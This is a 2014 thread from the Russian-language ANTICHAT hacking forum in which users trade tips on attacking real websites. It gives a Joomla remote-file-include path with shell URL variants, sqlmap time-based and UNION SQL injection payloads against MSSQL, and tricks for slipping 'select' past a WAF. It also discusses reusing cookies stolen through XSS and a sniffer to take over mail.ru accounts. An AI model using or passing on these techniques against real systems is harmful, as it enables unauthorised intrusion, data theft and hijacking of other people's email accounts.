ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.01.2014, 10:04
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446
Репутация:
82
|
|
в общем детский вопрос по рфи
пример рфи в джумле
Сообщение от None
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
как должен выглядеть путь к шелу?
Сообщение от None
http://site.ru/shell.txt
http://site.ru/shell.txt?
http://site.ru/shell.php
http://site.ru/shell.php?
http://site.ru/shell.txt%00
http://site.ru/shell.php%00
mosConfig_absolute_path так и должно быть или там нужно что то другое вписывать? |
|
|
12.01.2014, 15:34
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Если RFI и все зависимости удовлетворены, то удобнее всего http://site.ru/shell, а в конце ты прописываешь расширение, с которым идет запрос. Посмотреть его можно или в исходниках, или в логах.
|
|
|
|
13.01.2014, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
343026
Репутация:
391
|
|
Народ подскажите в чем беда.
использую SQLMAP, язва такого рода
back-end DBMS: Microsoft SQL Server 2012
Place: GET
Parameter: sku
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: sku=-2896' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(111)+CHAR(113)+ CHAR(121)+CHAR(73)+CHAR(87)+C
HAR(122)+CHAR(67)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR (82)+CHAR(79)+CHAR(113)+CHAR(103)+CHAR(119)+CHAR(1 14)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: sku=USUSUSU'; WAITFOR DELAY '0:0:5'--
имена баз данных достает нормально, таблицы с текущей тоже все ок, колонки с таблицы ок, а вот данные не хочет тянуть!
так пытается достать инфу
sku=USUSUSU'; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM dbname.dbo.Users),1,1))>1) WAITFOR DELAY '0:0:5'--
в чём может быть косяк??? заранее благодарен за ответы!
|
|
|
|
13.01.2014, 17:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
фильтруется просто слово select на сайте. т.е даже если www.site.com/asfselect123 попробовать ввести, он покажет что сайт хотят взломать. Как попробовать обойти можно?
|
|
|
|
13.01.2014, 18:20
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
SeLeCt
SEselectECT
|
|
|
|
13.01.2014, 20:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от Br@!ns
Br@!ns said:
фильтруется просто слово select на сайте. т.е даже если www.site.com/asfselect123 попробовать ввести, он покажет что сайт хотят взломать. Как попробовать обойти можно?
Попробуйте принудительно все символы в url-encode загнать, это может сработать, заивист от типа ids\waf. Как вариант, поиграться с регистром. Или же вообще отойти от union select.
Также можно попробовать определить waf\ids и глянуть на его исходники\стандартные правила. Есть тулза WAFW00F для этого.
|
|
|
|
13.01.2014, 23:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
343026
Репутация:
391
|
|
или SQLMAP опция --check-waf
|
|
|
|
14.01.2014, 17:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
Вопрос касательно хсс на маилру
украл я куки к примеру лежат они у меня на сниффере
Беру отправлялку запросов отпраляю запрос на главную с этими куками и вижу что я типо авторизован с чужого ящика
После обновления страницы ничего этого не будет так как в браузер эти куки не запишутся...
Как я понял в маилру главная кука отвечающая за вход Mpop
меняю mpop в опере и открываю маилру
и что же вы думаете? зашел? - НЕТ
просит ввести заново пароль при этом кука больше не работает!!
Какже зайти на почту с чужих кук?
|
|
|
|
14.01.2014, 22:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от psihoz26
psihoz26 said:
Вопрос касательно хсс на маилру
украл я куки к примеру лежат они у меня на сниффере
Беру отправлялку запросов отпраляю запрос на главную с этими куками и вижу что я типо авторизован с чужого ящика
После обновления страницы ничего этого не будет так как в браузер эти куки не запишутся...
Как я понял в маилру главная кука отвечающая за вход Mpop
меняю mpop в опере и открываю маилру
и что же вы думаете? зашел? - НЕТ
просит ввести заново пароль при этом кука больше не работает!!
Какже зайти на почту с чужих кук?
Так проверьте же. Кука может быть не одна, может быть еще на одном домене, может быть привязка к ip. А скорее всего привязка к user-agent'у.
|
|
|
|
15.01.2014, 02:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
Сообщение от madhatter
madhatter said:
Так проверьте же. Кука может быть не одна, может быть еще на одном домене, может быть привязка к ip. А скорее всего привязка к user-agent'у.
Немного поэксперементировав я пришел к некому результату но всёже это ещё не результат...
Залогинился в опере, заюзал xss , открыл сниифер - куки уже тут.
Открываю фаерфокс и плагин в нем (Live http replay)
мне нужен был именно он так как очень просто можно заменить все куки запроса
Вобщем открываю главную, ловлю запрос , меняю в нем куки на те что пришли на сниффер, повторяю запрос и вижу что я типо залогинен с почты которая насамом деле открыта у меня в опере.
Конечно же зайти на неё не удалось так как куки переданные плагином не сохранились в браузер.
Переберал все возможные комбинации и оказалось что для этого хватит всего одной куки Mpop и страница также будет показывать что я якобы залогинен.
А если куку Mpop просто сунуть в браузер и сохранить то она умрет и меня попросит ввести пассворд повторно.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
